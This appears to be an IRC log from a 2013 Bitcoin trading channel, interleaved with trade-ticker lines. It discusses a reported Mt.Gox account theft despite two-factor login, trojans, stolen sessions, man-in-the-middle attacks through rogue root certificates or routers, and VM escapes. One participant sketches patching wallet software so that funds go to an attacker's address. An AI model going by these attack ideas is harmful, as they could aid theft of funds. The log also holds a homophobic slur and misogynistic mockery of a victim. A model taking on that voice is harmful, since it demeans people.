than btc. May 14 04:43:36 which is insane, but anyway. May 14 04:43:47 NOW what you do with this ion cannon is steal random 4 btc wallet ? May 14 04:43:55 you'd have to be born last night to actually believe this. May 14 04:44:14 every ion cannon has to be fired at a diseased goat during development May 14 04:44:21 if indeed this was an attack able to cut through their (braindead) 2fa implementation May 14 04:44:30 90% of thje top accounts would be hit simultaneously. May 14 04:44:37 occam's razor suggests that our chump lied about using 2fa May 14 04:44:37 no, it does not have to be. May 14 04:44:46 maybe. May 14 04:45:07 or that mtgox has a session remanence bug May 14 04:45:13 the chump has no history of lieing May 14 04:45:15 mtgox does. May 14 04:45:39 probably the culprit then. May 14 04:45:56 [HAVELOCK] [SDICE] 15 @ 0.2898 = 4.347 BTC [+] May 14 04:46:24 it wouldn't be the first website May 14 04:46:32 fuck me. the idea of a website is ridiculous May 14 04:46:35 mircea_popescu: you evil tempter, you just made me want to transfer btc to mtgox just to buy their yubikey. May 14 04:46:42 but it wouldn't be the first website with a broken 2fa implementation. May 14 04:46:56 [HAVELOCK] [VTX] 2 @ 0.43551 = 0.871 BTC [+] May 14 04:48:41 also remember that chumps have a tendency to lie to themselves May 14 04:49:10 anuyay, getting back to it. the branch was off May 14 04:49:10 there is only so many times that this can happen without a real effect May 14 04:49:12 and to blame their betters when their world burns May 14 04:49:22 now, returning there : how many times ? May 14 04:49:57 damned if I know how many times. how many people would even admit that this happened to them, if it had May 14 04:51:07 see, but it'd seem to me you readily argue both ends of this rope. May 14 04:51:40 one more observation: yubi works by emulating usb keyboard. which makes for a very simple man in the middle, esp. if you press the button an extra time. May 14 04:52:03 or if the switch has bounce May 14 04:52:15 i doubt anyone actually visited the guy's apartment May 14 04:52:29 for the simple reason that if anyone ever did most of the us would be so very much less lonely. May 14 04:52:38 nobody had to, but a trojan May 14 04:52:49 that good a trojan ? May 14 04:52:51 4 btc ? May 14 04:52:53 hm. May 14 04:53:34 I study trojans for money. Most BTC botnets, for example, are quite pitiful (a handful of GH/sec.) May 14 04:53:48 indeed. May 14 04:53:54 the author has little control over who will be infected May 14 04:54:08 all he has is hope, that some of the chumps will own high-end ATI cards, etc May 14 04:54:43 so it is entirely conceivable that a yubikey-enabled gox diddler exists but has managed to infect only paupers May 14 04:55:13 i have yet to see any indication of such wonder in practice. May 14 04:55:16 not that I believe the linked thread to be evidence of such, mind you May 14 04:55:21 yeah. May 14 04:56:12 my only argument, really, is that btc as we know it is a soft target, and that life will become considerably more interesting once the truly competent people take an interest in playing. May 14 04:56:37 it's hard to assess to validity of any claim, but there is a common factor between her story and this one - http://www.reddit.com/r/Bitcoin/comments/1e79ig/how_were_my_encrypted_bitcoin_and_litecoin/ May 14 04:56:52 asciilifeform soft but soft in the sense of amoeba May 14 04:56:55 or gribble colony May 14 04:57:23 both had their wallet.dat on truecrypt May 14 04:57:30 optimator the reason girl said anything/i'm leading some credence to the claim of 2fa is because this isn't the first case i've heard. May 14 04:57:42 an amoeba colony, but in a public toilet, waiting for the janitor and his chlorine. May 14 04:58:14 MITM attack, or just bad random seed for 2fa? May 14 04:58:14 truecrypt in particular is trivially broken on a compromised machine. May 14 04:58:17 [BTCTC] [TAT.ASICMINER] 17 @ 0.015 = 0.255 BTC [-] May 14 04:58:19 I used a random 64 character ASCII character password from this site for my truecrypt password. May 14 04:58:24 that may have been sniffed maybe >? May 14 04:58:33 [BTCTC] [TAT.ASICMINER] 13 @ 0.01512 = 0.1966 BTC [+] May 14 04:58:42 maybe, https with EV certificate May 14 04:58:58 gox has EV cert making MITM seem unlikely May 14 04:59:56 optimator: have you personally gone through the trusted public cert store in your browser/OS? May 14 05:00:11 but I agree I like my own entropy over someone else's - I like my own brand :) May 14 05:01:00 asciilifeform: no - and it kinda freaks me out. I think SSL cert authentication through a PKI is a gapping hole May 14 05:01:09 SSL is a joke by design. May 14 05:01:22 http://www.reddit.com/r/Bitcoin/comments/1e79ig/how_were_my_encrypted_bitcoin_and_litecoin/c9xjk4s May 14 05:01:26 actually this is interesting May 14 05:01:34 because of the change issue. wallet.dat was stolen May 14 05:02:23 btw there is never any real need to steal wallet.dat. all you need to do is patch bitcoind (or whatever) on the disk so that it sends everything to address X when you finally key in the passphrase. May 14 05:02:33 mircea_popescu: it's very interesting - I like the conclusion of the time the wallet was stolen May 14 05:03:06 asciilifeform bitcoind is such a mess it'd be easier to make a million dollars being a janitor. May 14 05:03:24 as far as the world could tell (even if you log all the packets coming out of your home) it will look like you voluntarily donated your stash to X. May 14 05:03:38 "I haven't nor will I ask for donations. This truly sucks for me, but I only want to find out how this happened. I wish I could see the code/method used for educational purposes. Fuck people who steal. I strive for bitcoins and litecoins to gain popularity among the masses and become an accepted currency in societies eyes." May 14 05:03:45 always funny when people with 85 ltc speak of the masses. May 14 05:04:12 mircea_popescu: believe me (or not, your choice) this is actually very, very easy. May 14 05:04:33 this. May 14 05:04:52 this <- patching bitcoind. May 14 05:04:54 "In fact, scratch the social engineering, you don't need to convince someone to run your .exe if you can just run your .exe for them via a Java drive-by attack, and admit it, you've left Java installed for extended periods of time, even if you try to keep it uninstalled normally." May 14 05:04:59 people actually still use java ?! May 14 05:05:11 "I know I've found this one thing that I just have to download and install Java for, then totally forget or put off uninstalling it afterwards, many a time." May 14 05:05:26 mircea_popescu: 85 * 3.12 = wealth for the masses May 14 05:05:35 some people have jre installed for wurk, etc May 14 05:05:42 and some people shit in their kitchen, yes May 14 05:05:47 on an actual machine ? May 14 05:05:56 [HAVELOCK] [ASICM] 76 @ 0.01493999 = 1.1354 BTC [+] May 14 05:05:58 [HAVELOCK] [ASICM] 258 @ 0.01494 = 3.8545 BTC [+] May 14 05:06:01 you'd be surprised May 14 05:07:14 i guess. May 14 05:07:16 jre is just a well-known egregous case. drive-bys are regularly discovered in just about every consumer browser May 14 05:07:18 but what the fuck for, seriously. May 14 05:07:22 *egregious May 14 05:09:09 my other point is that btc ups the ante for working on hard targets as well as soft ones. you can do some very nice MITM with a compromised router, for instance. May 14 05:09:16 [BTCTC] [TAT.ASICMINER] 27 @ 0.01512 = 0.4082 BTC [+] May 14 05:09:23 "I figured if I was ever the victim of a wallet stealing program, implementing a dummy in the default location would fool it and upload it, rather than my real one, to the attackers choice, but I was wrong." May 14 05:09:24 yeah srsly. May 14 05:09:43 asciilifeform give me an example. May 14 05:09:53 re: btc specifically? May 14 05:10:11 ah - the empty-wallet-fake-em-out security measure May 14 05:10:54 asciilifeform re your router mitm May 14 05:11:19 optimator not sure why people imagine machines locate items by name May 14 05:11:39 feel free to interpret my silence as proof that I'm full of shit, but personally I'm rather fond of living. May 14 05:12:29 Used bitcoin-qt and litecoin-qt. For the wallets, those encryption passwords were from memory. The truecrypt password, I always copied and pasted the password from a text file, on a USB drive, inside a password protected winrar file, inside of a password protected winrar file, inside of a password protected winrar file, totaling 3 different password protected rars to reach the .txt file. May 14 05:12:35 who the fuck designed this process ;/ May 14 05:12:46 anyway, thanks optimator, most entertaining link May 14 05:12:54 I have to run 8 year old java versions May 14 05:12:55 I'll mention one example from places far away. In certain countries, doctored root certs are routinely placed into default ms-windows installs wherever possible. May 14 05:12:58 i don't think it has anything to do with the 2fa mtgox issue but anyway May 14 05:13:01 several different ones May 14 05:13:18 asciilifeform the ideea is, suppose i pass all my traffic through your controlled relay May 14 05:13:20 then, mass MITM of gmail, etc May 14 05:13:26 a linux box, rather than a router, for convenience. May 14 05:13:28 so now what ? May 14 05:13:46 almost every ssl cert in this environment is self signed and long epired May 14 05:13:49 [BTCTC] [ASICMINER-PT] 1 @ 1.549899 BTC [+] May 14 05:13:56 now you go to a site with routinely botched ssl, like mtgox (at least in the recent past), and then click "what the hell" when your browser complains May 14 05:14:00 such is corplife May 14 05:14:48 alternatively, a drive-by is used to make your machine click "yes" for you. May 14 05:15:10 asciilifeform: don't forget this approach to compromising ssl sercurity - https://freedom-to-tinker.com/blog/sjs/how-the-nokia-browser-decrypts-ssl-traffic-a-man-in-the-client/ May 14 05:15:11 asciilifeform except i never use a site over https anyway May 14 05:15:46 dub sux to be you bro. May 14 05:15:49 mircea_popescu: yes, the girls calculate RSA signatures for you with paper and pencil May 14 05:15:56 or ought to May 14 05:15:59 you'll find the same thing at most f500's May 14 05:16:10 why do they need to calculate rsa or wut ? May 14 05:16:27 to sign mpex messages? May 14 05:16:37 mpex is http May 14 05:16:40 [BTCTC] [ASICMINER-PT] 2 @ 1.5499 = 3.0998 BTC [+] May 14 05:16:54 pgp over http (or, someday, over pigeon?) May 14 05:17:02 well yes May 14 05:17:06 you hadn't noticed ?! May 14 05:17:13 yes May 14 05:17:44 as it should be. but if a PC is involved, you might run into strange one day May 14 05:17:58 "x86 virtualization is about basically placing another nearly full kernel, full of new bugs, on top of a nasty x86 architecture which barely has correct page protection." May 14 05:18:04 great quote that. May 14 05:18:17 "Then running your operating system on the other side of this brand new pile of shit. You are absolutely deluded, if not stupid, if you think that a worldwide collection of software engineers who can't write operating systems or applications without security holes, can then turn around and suddenly write virtualization layers without security holes." May 14 05:18:17 did I write that? May 14 05:18:26 i was actually thinking, is this our d friend ? May 14 05:18:31 http://www.reddit.com/r/Bitcoin/comments/1e79ig/how_were_my_encrypted_bitcoin_and_litecoin/c9xss1w May 14 05:18:55 ok, wasn't me this time. but "I approve of this message (tm)" May 14 05:19:54 vm escapes run the spectrum from the apocalyptic to the "it always worked this way and we don't give a fuck" May 14 05:20:24 example of the latter: many (most?) xen installs let you set the virtual nic card into promiscuous mode if you root one running os May 14 05:20:41 [BTCTC] [ASICMINER-PT] 2 @ 1.5499 = 3.0998 BTC [+] May 14 05:21:31 um May 14 05:21:31 [BTCTC] [ASICMINER-PT] 3 @ 1.54995 = 4.6499 BTC [+] May 14 05:21:39 so what's the point of virtualization then May 14 05:21:57 so you can rent a "server" to chumps without actually using one up May 14 05:22:09 it is like fractional reserve banking for the hosting business. May 14 05:23:02 some machine architectures (ibm mainframes) had virtualization baked in in an intelligent way, vs. the x86 retrofit May 14 05:23:16 [BTCTC] [ASICMINER-PT] 5 @ 1.54998 = 7.7499 BTC [+] May 14 05:23:30 [BTCTC] [ASICMINER-PT] 20 @ 1.55 = 31 BTC [+] May 14 05:23:32 but in the pc world it is used as an attempt to paper over the fact that the os sucks May 14 05:23:49 [BTCTC] [ASICMINER-PT] 30 @ 1.55 = 46.5 BTC [+] May 14 05:24:15 [BTCTC] [ASICMINER-PT] 5 @ 1.59444 = 7.9722 BTC [+] May 14 05:24:17 o i see May 14 05:24:20 [BTCTC] [ASICMINER-PT] 19 @ 1.5999 = 30.3981 BTC [+] May 14 05:24:23 this is not a bug as much as a hosting feature May 14 05:24:38 [BTCTC] [ASICMINER-PT] 6 @ 1.67 = 10.02 BTC [+] May 14 05:24:51 [BTCTC] [ASICMINER-PT] 1 @ 1.6799 BTC [+] May 14 05:25:04 [BTCTC] [ASICMINER-PT] 1 @ 1.69 BTC [+] May 14 05:25:05 it not only lets you sell the same machine many times, but passes the security buck to the chump: "oh, you got rooted? your fault, should have patched yourself" May 14 05:25:14 "TC gives you a false sense of security so its worse than no partition encryption." May 14 05:25:18 this may actuallty be true May 14 05:25:30 this is deeply and profoundly true. May 14 05:25:39 my impression of the general truecrypt population is that they're not particularly more secure than average May 14 05:25:42 just more preocupied with it May 14 05:25:55 asciilifeform: doesn't it work if you start with the base as the secure OS. Then virtualize your browsing OS, virtualize your bitcoind OS, virtualize your banking OS, but the base is secure May 14 05:25:56 [HAVELOCK] [ASICM] 100 @ 0.01494 = 1.494 BTC [+] May 14 05:26:07 the more the tunnel vision, the more blind spots for obvious stuff May 14 05:26:27 optimator: if the virtualization scheme has an escape (or even just leaks info) you're just as fucked May 14 05:27:00 for instance, AFAIK most x86 virtualization setups leak info through the tlb cache (timing) May 14 05:27:07 assuming the base has been compromised, or our you suggesting the base could become compromised through a virtualized OS May 14 05:27:13 the latter. May 14 05:27:28 how? May 14 05:27:44 optimator: http://en.wikipedia.org/wiki/Virtual_machine_escape May 14 05:28:04 and if you find a fresh one, I do hope you have better sense than to tell us. May 14 05:28:24 well fuck May 14 05:28:59 http://www.bitcoiney.com/psa-i-had-480-stolen-out-of-my-mt-gox-account-this-morning-despite-having-2-factor-identification-here-is-what-happened May 14 05:29:05 actually... there's an update to the story. May 14 05:29:48 gotta love the advice to file a police report May 14 05:29:56 [HAVELOCK] [ASICM] 32 @ 0.01494 = 0.4781 BTC [+] May 14 05:29:57 totallyu. May 14 05:30:18 "my house was raided by interstellar bandits, and they took my TV set to alpha centauri." - "please file a police report." May 14 05:31:29 someone should sit with the chump, and patiently explain that mtgox doesn't talk to your yubikey. it talks to your idiot consumer pc that happens to have a yubikey plugged in, and a display that can output whatever your new owner wants it to. May 14 05:32:00 asciilifeform read on, she catches on. May 14 05:32:34 wait a sec, this was your camgirl ? May 14 05:32:40 the very same? May 14 05:32:55 "Edit2: I was finally able to log into my account and found an API key with full rights to everything. I never made one, wtf does this mean?" May 14 05:33:06 basically this is a stolen session May 14 05:33:17 asciilifeform one of, the one with the daytrading. May 14 05:34:10 [BTCTC] [ASICMINER-PT] 1 @ 1.69 BTC [+] May 14 05:34:42 [BTCTC] [TAT.ASICMINER] 8 @ 0.01525 = 0.122 BTC [+] May 14 05:34:50 the proper course of action in a case like this is to 1) publish a (sanitized) image of your hdd and 2) perform manly seppuku if necessary May 14 05:34:58 "If mircea trusts me with BTC I cant be too much of a fuckup." optimator wipes tear May 14 05:35:07 the whining is disappointing May 14 05:35:18 eh you lot are just mean. May 14 05:35:30 [BTCTC] [TAT.ASICMINER] 105 @ 0.01525 = 1.6013 BTC [+] May 14 05:36:06 what, just because she's a girl? May 14 05:36:09 yeah. May 14 05:36:10 that's no excuse: http://historum.com/asian-history/14743-jigai-vs-seppuku-japanese-female-suicide.html May 14 05:36:25 lol May 14 05:37:20 anyway, as you say. mtgox does not talk to yubikey, it talks to teh computor. May 14 05:38:21 perhaps consumers should be encouraged rather than discouraged in their belief that their pc is alive and is inhabited by devils. May 14 05:38:48 i don't think she actually understood before what sessions are and how they work May 14 05:39:02 boobs May 14 05:39:47 it is rather like, most people are only vaguely aware that they have livers, until the shot rings out and there is an extra bodily orifice suddenly present. May 14 05:39:49 asciilifeform: my vote for best laugh tonight May 14 05:40:21 imo sessions are this idiocy from hell. May 14 05:40:46 the whole pc orchestra (incl. but not limited to wintel) is idiocy from hell. May 14 05:41:08 yes but this is worse. May 14 05:41:41 actually tbh the "logged in" concept, rested on supposed sessionization of a stateless protocol is, imo, the most ridiculous idea of mankind to date. May 14 05:41:54 female circumcision makes comparatively a lot more sense. May 14 05:41:58 but the chumps love it (except when they don't, yes) May 14 05:42:15 right May 14 05:42:25 convenience May 14 05:42:48 i mean when it was originally introduced it was like... fuck this shit, nobody cares, it's for some blog. May 14 05:43:00 "how bad can it get" etc. May 14 05:43:06 my point, though, is that even if you dispense with the convenience of sessions and go the full-bore "hair shirt" with a paper one-time-pad or whatnot, a compromised machine is still a compromised machine. May 14 05:43:07 well... apparently it can get pretty bad. May 14 05:43:24 wasn't it all? I mean what could go wrong with a local hosts file? May 14 05:43:41 very true May 14 05:44:17 i guess in the competition for "worst idea to date" they're all winners. May 14 05:44:43 [BTCTC] [ASICMINER-PT] 1 @ 1.675 BTC [-] May 14 05:44:45 the one common idea here is that keeping one's money in a public toilet is a Bad Thing. May 14 05:45:01 esp if your money smells May 14 05:45:06 worse than the toilet May 14 05:45:13 but.. thats where I spend it? May 14 05:45:21 i thought that;'s where you made it. May 14 05:45:27 lol May 14 05:45:48 somebody needs to make a new tcp/ip stack May 14 05:45:55 one that crypts natively May 14 05:46:03 basically a sort of otr for ip May 14 05:46:19 on a new machine architecture, that crypts ram/disk natively, and a number of other essentials... May 14 05:46:21 call it bittoken ring May 14 05:46:31 asciilifeform yeah May 14 05:46:54 ideally your machine would come with a one disk onetimepad May 14 05:46:58 1tb or w/e worth of it. May 14 05:46:59 that'd be pretty cool May 14 05:47:01 throw it out when done May 14 05:47:03 except that phrasing the problem as a failure to encrypt is misleading May 14 05:47:15 asciilifeform no it's not. identity is cryptity. May 14 05:47:21 well yes May 14 05:47:23 [BTCTC] [TAT.ASICMINER] 13 @ 0.01525 = 0.1983 BTC [+] May 14 05:47:45 but when you routinely unearth the plaintext onto potentially-compromised hardware, you are shitting in your kitchen May 14 05:47:52 the problem quite fundamentally is a pretense to have identity outside of cryptography May 14 05:47:55 no such thing is possible. May 14 05:48:23 anything pretending to exist outside of a cryptographic identity is living in a state of sin. May 14 05:48:23 recall the story by your PR girl? May 14 05:48:31 asciilifeform which one ? May 14 05:48:46 mircea_popescu: trust, you have to start somewhere May 14 05:49:08 optimator no but look, the very notion of identity, ie, the possibility to distinguish X from Adam May 14 05:49:18 rests strictly on some form of encryption. May 14 05:49:25 this one: http://thewhet.net/2012/shall-be-delivered/ May 14 05:49:26 but i mean *strictly*. May 14 05:49:31 asciilifeform a yes May 14 05:50:01 and, of course, the grandfather of them all: http://en.wikipedia.org/wiki/The_Cold_Equations May 14 05:50:24 [BTCTC] [S.DICE-PT] 1000 @ 0.00285 = 2.85 BTC [-] May 14 05:50:25 mircea_popescu: yes, but all predicated on trust - even WoT has issues scaling May 14 05:50:56 what issues specifically ? May 14 05:51:23 the further you are away from x+1 the less trust you can have May 14 05:51:23 [BTCTC] [TAT.ASICMINER] 124 @ 0.01525 = 1.891 BTC [+] May 14 05:51:47 so ? May 14 05:52:12 how do I know my banking site is *really* my banking site May 14 05:52:25 because they sign your slip with their signature. May 14 05:52:35 what most people don't get is that your computer is your priest, doctor, and shrink all in one box: http://glyf.livejournal.com/46589.html May 14 05:52:40 how do I get their public key? May 14 05:52:50 optimator you exchange keys when you start your relationship May 14 05:52:59 you give them yours they give you theirs as part of account opening May 14 05:53:13 right. x+1 May 14 05:53:17 you are trusting the work of ten thousand people (some of whom think your flesh is rather tasty) when you ask it to represent the world to your eyes and act on your behalf. May 14 05:53:28 optimator for some reason i don't see the problem you see ? May 14 05:53:40 [BTCTC] [TAT.ASICMINER] 62 @ 0.0153 = 0.9486 BTC [+] May 14 05:54:37 imagine if someone were to "root" your eyes and your hands. May 14 05:54:39 "Participants in the DRM debate implicitly hold the view that the ownership of your operating system, your personal information, and your media is a complex, joint relationship between you, your operating system vendor, the authors of the applications you run, and the owners of any media that pass through that application. Prevailing wisdom is that the way any given software behaves should be jointly determined by all May 14 05:54:39 these parties, factoring in all their interests, and that the argument is simply a matter of degree: who should be given how much control, and by what mechanism." May 14 05:54:41 lmao good one. May 14 05:54:44 [BTCTC] [TAT.ASICMINER] 188 @ 0.0153 = 2.8764 BTC [+] May 14 05:54:48 only an american could actually think this. May 14 05:54:57 [BTCTC] [TAT.ASICMINER] 50 @ 0.01544 = 0.772 BTC [+] May 14 05:55:10 [BTCTC] [TAT.ASICMINER] 20 @ 0.0155 = 0.31 BTC [+] May 14 05:55:32 "The "you don't own your computer" paradigm is not merely wrong. It is violently, disastrously wrong, and the consequences of this error are likely to be felt for generations to come, unless steps are taken to prevent it." May 14 05:55:49 i don't think it's anything of the sort. May 14 05:55:56 a computer is clearly defined. May 14 05:55:57 [HAVELOCK] [ASICM] 2 @ 0.01495 = 0.0299 BTC [+] May 14 05:56:07 the chinese may make plaster things which on the surface look like computers May 14 05:56:15 and try to inject tyhem into trade as combuders or w/e May 14 05:56:18 this has no bearing. May 14 05:56:22 a computer is a computer. May 14 05:56:29 [BTCTC] [TAT.ASICMINER] 1 @ 0.0153 BTC [-] May 14 05:56:30 following the example... if I want to transfer money via wire to another bank, then my bank establishes a relationship with bank b. I trust the key exchange has worked. Bank b is X+2. For X-n the WoT breaks down May 14 05:56:56 optimator if you transfer money via wire you send it to your bank with instructions May 14 05:57:04 they send it to their correspondent with instructions May 14 05:57:06 mircea_popescu: yes, but the false implication is that someone, somewhere on Planet 3 can actually buy a computer. in actual fact, they can only buy a "combuder." May 14 05:57:12 nobody promoted you to the job of wire central clearance house. May 14 05:57:27 asciilifeform i don't seem to have much trouble buying a computer May 14 05:57:37 no that's where I *trust* May 14 05:57:43 mircea_popescu: I sincerely hope you're joking May 14 05:58:09 your objections re x86 architecture aside May 14 05:58:16 [BTCTC] [TAT.ASICMINER] 8 @ 0.0153 = 0.1224 BTC [-] May 14 05:58:27 the fact that one can still hack banks to this day is proof enough May 14 05:58:28 how about firmware signed with their public key. I have to trust they exchanged it with A who exchanged it with B that finally gets to me May 14 05:58:34 [BTCTC] [TAT.ASICMINER] 1 @ 0.0159 BTC [+] May 14 05:58:37 optimator so ? May 14 05:58:58 mircea_popescu: the fact that all of your assets appear to be roughly where they are supposed to be is proof only of your good fortune. May 14 05:59:01 What is it does A->B->c->D and c is the bad guy? May 14 05:59:19 optimator recently we've had some practical testing of this. May 14 05:59:21 [BTCTC] [TAT.ASICMINER] 84 @ 0.0153 = 1.2852 BTC [-] May 14 05:59:31 you can to this day send orders to mpex via proxies no matter how dirty. May 14 05:59:40 the most they can do is relay. May 14 05:59:50 banks, interestingly, don't terribly mind being hackable, because sovereigns can sort of reverse their fuckups for them. and at any rate, they pass the cost onto chumps. May 14 06:00:05 btc is where the cold equations meet your skin up close and personal May 14 06:00:07 asciilifeform you read that excellent piece re base vs acid ? May 14 06:00:19 mircea_popescu: ? May 14 06:00:32 asciilifeform: please we call it a haircut, don't refer to the customers as chumps May 14 06:00:42 http://highscalability.com/blog/2013/5/1/myth-eric-brewer-on-why-banks-are-base-not-acid-availability.html May 14 06:00:54 [BTCTC] [TAT.ASICMINER] 70 @ 0.0159 = 1.113 BTC [+] May 14 06:01:09 in general commerce has always worked on the basis of reconciliation May 14 06:01:17 no serious surprise here May 14 06:01:52 mircea_popescu: I agree your model works, but if, in my example, c does bad stuff - I don't think you can tell. You simple have trusted others in the chain May 14 06:02:03 optimator so ? May 14 06:02:15 just because you're a shut-in doesn't mean the world can work on your paradigm. May 14 06:02:17 TAT.ASICMINER just passed S.MPOE for all time sales volume on BTCT.co May 14 06:02:31 [BTCTC] [TAT.ASICMINER] 29 @ 0.0159 = 0.4611 BTC [+] May 14 06:02:33 trust is central to society, and to the continuation of teh species. May 14 06:02:34 so far, whenever banks get burned, ultimately some nice fellows with printing presses (or automatic weapons, if need be) show up to make them whole again. May 14 06:02:55 [HAVELOCK] [ASICM] 50 @ 0.01495 = 0.7475 BTC [+] May 14 06:02:57 ha! idk, i just see it as an issue - maybe just me - sure May 14 06:03:19 optimator i don't even mean you personally May 14 06:03:22 btc is the first step into the fun world of interstellar commerce, where fuckups are between you and your gods to cry over May 14 06:03:32 i'm just saying, a relationship of trust isn't a weakpoint per se. it can be a strongpoint. May 14 06:03:51 [BTCTC] [TAT.ASICMINER] 30 @ 0.016 = 0.48 BTC [+] May 14 06:04:30 ThickAsThieves so good for you. May 14 06:04:31 anyone who cried over the ending of "shall be delivered" (http://thewhet.net/2012/shall-be-delivered/) hasn't really made peace with the cold equations yet. May 14 06:04:46 [BTCTC] [TAT.ASICMINER] 150 @ 0.01615 = 2.4225 BTC [+] May 14 06:05:00 "who do you sue when your parachute doesn't open" May 14 06:06:10 [BTCTC] [TAT.ASICMINER] 25 @ 0.01615 = 0.4038 BTC [+] May 14 06:10:55 [HAVELOCK] [ASICM] 448 @ 0.01495 = 6.6976 BTC [+] May 14 06:16:02 [BTCTC] [TAT.ASICMINER] 19 @ 0.01615 = 0.3069 BTC [+] May 14 06:16:36 Zzzzzzzzzz somebody do something May 14 06:16:58 I'm about to go back to forex May 14 06:17:31 lol May 14 06:18:40 recall the fellow in MP's comments who implied that secure systems were used by banks to secure "trillion dollar transactions" ? May 14 06:18:41 http://trilema.com/2013/some-basic-discussion-of-bitcoin-macroeconomy/ May 14 06:19:14 trillion dollar transactions in fiat are secured via "Ultima Ratio Regum." May 14 06:19:18 http://commons.wikimedia.org/wiki/File:Ultima_Ratio_Regum_Cannon.jpg May 14 06:19:56 in btc, we will need actual mechanical security. May 14 06:25:36 um May 14 06:30:24 what was gox volume this time last year May 14 06:36:02 oh geez, I just got sucked into Tilde’s story May 14 06:36:36 ~ May 14 06:36:45 which ? May 14 06:37:20 http://thewhet.net/2012/shall-be-delivered/ May 14 06:37:29 a May 14 06:37:50 broken trust May 14 06:38:02 but I say that with a :( May 14 06:38:47 [BTCTC] [ASICMINER-PT] 1 @ 1.674999 BTC [-] May 14 06:39:47 yeah May 14 06:40:48 so on to happier thoughts May 14 06:46:31 [BTCTC] [ASICMINER-PT] 1 @ 1.674999 BTC [-] May 14 06:47:14 [BTCTC] [ASICMINER-PT] 2 @ 1.675 = 3.35 BTC [+] May 14 06:47:54 [BTCTC] [ASICMINER-PT] 6 @ 1.69 = 10.14 BTC [+] May 14 06:56:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.01615 = 0.0969 BTC [+] May 14 06:59:20 lol this irs/teaparty thing is going great. May 14 06:59:44 i think putin is loling hard atm. May 14 07:02:16 haha, he probably is May 14 07:02:46 [BTCTC] [TAT.ASICMINER] 9 @ 0.01616 = 0.1454 BTC [+] May 14 07:02:57 soon there's goping to be all this us persecuted intellectuals flocking to the russian embassy May 14 07:02:57 [BTCTC] [TAT.ASICMINER] 11 @ 0.01616 = 0.1778 BTC [+] May 14 07:03:01 a la depardieu May 14 07:06:00 they say that more people have turned in their US passports this year than in any other year in history. May 14 07:06:46 this is true May 14 07:06:52 same was true of 2012 May 14 07:07:44 rich skilled people leave to asia and the middle east, poor people arive from latin america. "the us is becoming browner" May 14 07:08:25 http://finance.fortune.cnn.com/2013/05/08/citizenship-taxes-irs/ << 670 from the looks of this article. May 14 07:09:53 from what I've read, it seems like mexican immigration to the U.S has slowed signifigantly in the last few years... May 14 07:10:25 well i was taking a more decades average sort of thing May 14 07:10:34 oh yeah. then for sure. May 14 07:10:35 on a yearly basis yeah, immigration isn't what the 80s used to be May 14 07:11:25 when I lived in Tucson, it was crazy. there were like bodies being found in the desert all the time that had died from exposure. May 14 07:11:45 [BTCTC] [TAT.ASICMINER] 22 @ 0.01616 = 0.3555 BTC [+] May 14 07:12:50 so they had these volunteer programs that people would participate in to drop off water in the desert where people could find it... and even shoes with maps sewed into the tounges to help people find the way through the desert. May 14 07:12:55 srsly. May 14 07:13:01 [BTCTC] [TAT.ASICMINER] 22 @ 0.01616 = 0.3555 BTC [+] May 14 07:13:09 heh May 14 07:13:55 [HAVELOCK] [VTX] 3 @ 0.4644 = 1.3932 BTC [+] May 14 07:14:49 when i first moved down there 10 years ago, there wasn't any real border patrol presense, but now? huge. May 14 07:15:18 hrm May 14 07:15:25 I should cash out of bfl May 14 07:15:43 lol what May 14 07:15:47 [BTCTC] [TAT.ASICMINER] 47 @ 0.01619 = 0.7609 BTC [+] May 14 07:15:56 someone talking about paying 45btc for a 4000 range preorder in the auction forum May 14 07:16:24 what product is that / May 14 07:16:34 65gh single May 14 07:17:08 im wondering what they would pay for a FPGA single with a 1700 (first 24hrs) upgrade order May 14 07:18:34 dub: at current diff you'd earn 45 btc in 20 days. May 14 07:18:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.01619 = 0.0486 BTC [+] May 14 07:19:11 meaningless but true May 14 07:19:11 [BTCTC] [TAT.ASICMINER] 97 @ 0.01619 = 1.5704 BTC [+] May 14 07:19:35 [BTCTC] [ASICMINER-PT] 3 @ 1.69 = 5.07 BTC [+] May 14 07:19:42 well 45 btc now is a hedge against difficulty increase May 14 07:19:49 [BTCTC] [ASICMINER-PT] 7 @ 1.69 = 11.83 BTC [+] May 14 07:22:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.01619 = 0.0324 BTC [+] May 14 07:24:07 [BTCTC] [TAT.ASICMINER] 20 @ 0.0162 = 0.324 BTC [+] May 14 07:25:46 [BTCTC] [TAT.ASICMINER] 6 @ 0.0162 = 0.0972 BTC [+] May 14 07:28:18 optimator no, it's a hedge against bfl never delivering it May 14 07:29:04 well that too May 14 07:30:48 I'd like to think they're just incompetent rather than executing the long con May 14 07:31:00 they are incompetently executing the randomcon May 14 07:31:28 lol May 14 07:32:06 trollcon May 14 07:36:59 heh, remember when vrag would battle these guys? i miss that. May 14 07:37:03 *???? May 14 07:37:03 Disclaimer: I don't know the much about stock/shares, etc and I don't have the ability to program such a complex piece of software – but I believe I can make it happen and think this is currently a good idea. Please critque my idea. I'm open minded about all of it. May 14 07:37:08 fucking shot these people. May 14 07:37:24 mod6 ya, pity he disapeared himself. May 14 07:38:57 [BTCTC] [ASICMINER-PT] 1 @ 1.654005 BTC [-] May 14 07:39:01 [BTCTC] [ASICMINER-PT] 1 @ 1.654004 BTC [-] May 14 07:39:05 [BTCTC] [ASICMINER-PT] 1 @ 1.654 BTC [-] May 14 07:39:10 [BTCTC] [ASICMINER-PT] 2 @ 1.65 = 3.3 BTC [-] May 14 07:39:41 [BTCTC] [ASICMINER-PT] 1 @ 1.64 BTC [-] May 14 07:39:46 [BTCTC] [ASICMINER-PT] 1 @ 1.63 BTC [-] May 14 07:40:13 [BTCTC] [ASICMINER-PT] 2 @ 1.69 = 3.38 BTC [+] May 14 07:42:43 Whatever I can do to help (javascript programmer). << lol May 14 07:43:11 who styles themselfs as a JS programmer anyway!? eek May 14 07:43:33 i think pigeons recalls this exchange some kids were starting about mid 2012 May 14 07:43:44 or maybe just after glbse death May 14 07:43:50 it had an irc chan andeverything May 14 07:47:17 JS programmer == I'm a huge faggot please rape my face May 14 07:47:29 [BTCTC] [TAT.ASICMINER] 7 @ 0.01616 = 0.1131 BTC [-] May 14 07:47:42 [BTCTC] [TAT.ASICMINER] 13 @ 0.01615 = 0.21 BTC [-] May 14 07:47:53 Scrat more like, im 14 and trying to get into this computer stuff. May 14 07:48:42 no MP, that's visual basic May 14 07:48:47 lol but i doubt you run around telling people about it, Scrat May 14 07:49:13 >ks May 14 07:49:13 er May 14 07:49:15 >js May 